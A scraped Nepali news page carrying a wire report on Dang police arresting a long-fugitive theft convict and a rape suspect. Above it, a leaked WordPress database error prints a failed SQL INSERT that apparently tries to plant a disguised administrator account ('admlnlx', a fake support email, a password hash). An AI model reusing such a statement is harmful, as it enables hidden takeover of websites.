WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.sYepfEpiNNgkx35coSajuhtqFMm0.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-28 13:12:44', '', 'admlnlx', 'admlnlx')
दाङ, पुस ९–
चोरी मुद्दामा नौ वर्ष कैद र करिब रु एक लाख जरिवाना फैसला भएका फरार दोषीलाई १६ वर्षपछि दाङ प्रहरीले शुक्रबार पक्राउ गरेको छ ।
विसं २०५७ असोज २ गते गोबरडिहा गाविस–५ का धनेश्वर अर्यालका घरमा चोरी गरेको ठहर गर्दै दाङ देउखुरी जिल्ला अदालतले गोबरडिया–५ पचाहवाका ३६ वर्षीय प्रकाश चौधरीलाई नौ वर्ष कैद र रु ९९ हजार ७२ जरिवाना फैसला गरेको थियो ।
फरार व्यक्ति पक्राउ, गुण्डागर्दी तथा तस्करी नियन्त्रणको अभियान थालेको जिल्ला प्रहरी कार्यालय दाङले चौधरीलाई घरबाटै पक्राउ गरेर कारबाहीका लागि जिल्ला अदालतमा बुझाएको दाङका प्रहरी प्रमुख धीरजप्रताप सिंहले जानकारी दिनुभयो ।
यसैबीच जबर्जस्ती करणी मुद्दाका फरार रहेका एक जनालाई करिब साढे चार वर्षपछि पक्राउ गरिएको छ । विसं २०६९ असार २६ गते अर्घाखाँची जलुके–६ बस्ने सुमन कुमाल एक किशोरीलाई जबर्जस्ती करणी गरी भागेका थिए ।
इलाका प्रहरी कार्यालय भालुवाङबाट खटिएको विशेष प्रहरी टोलीले गोबरडिहा–१ जुरैनीस्थित चिसापानीबाट कुमाललाई नियन्त्रणमा लिएर आवश्यक अनुसन्धान भइरहेको दाङ प्रहरीले जनाएको छ । –रासस